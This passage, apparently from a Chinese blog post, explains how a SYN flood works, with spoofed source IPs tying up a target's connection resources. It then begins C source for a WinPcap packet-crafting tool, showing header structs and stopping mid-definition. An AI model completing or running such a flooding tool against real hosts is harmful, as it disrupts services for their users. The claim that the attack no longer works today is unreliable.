syn_flood攻击得原理很简单,通过向目的主机发送大量建立TCP连接得请求,但源IP地址是乱填的,所以本机不会收到TCP应答,而其它主机收到TCP应答后由于之前并没有请求过TCP连接,所以会丢弃这个应答,导致被攻击的主机空等一段时间,资源被白白浪费。
当然这也是理论上的结果,实际上在现在,这种攻击肯定是行不通的。
#include <stdlib.h>
#include <stdio.h>
#include <pcap.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <string.h>
#include <stdio.h>
#include <wtypes.h>
#pragma comment(lib,"ws2_32.lib")
#define SEQ 0x12121212
#define PCAP_ERRBUF_SIZE 256
typedef struct et_header
{
unsigned char eh_dst[6]; //目的地址
unsigned char eh_src[6]; //源地址
unsigned short eh_type; //eh_type的值需要考察上一层的协议,如果为ip则为0×0800
}ET_HEADER;
//IPv4包头结构体
typedef struct ip_header {
unsigned char ver_ihl; //Version (4 bits) + Internet header length (4 bits)
unsigned char tos; //Type of service
unsigned short tlen; //Total length
unsigned short identification; //Identification
unsigned short flags_fo; //Flags (3 bits) + Fragment offset (13 bits)
unsigned char ttl; //Time to live
unsigned char proto; //Protocol
unsigned short crc; //Header checksum
unsigned long ip_src; //Source address
unsigned long ip_dst; //Destination address
}IPHEADER, *PIPHEADER;
//TCP包头结构体
typedef struct tcp_header {
WOR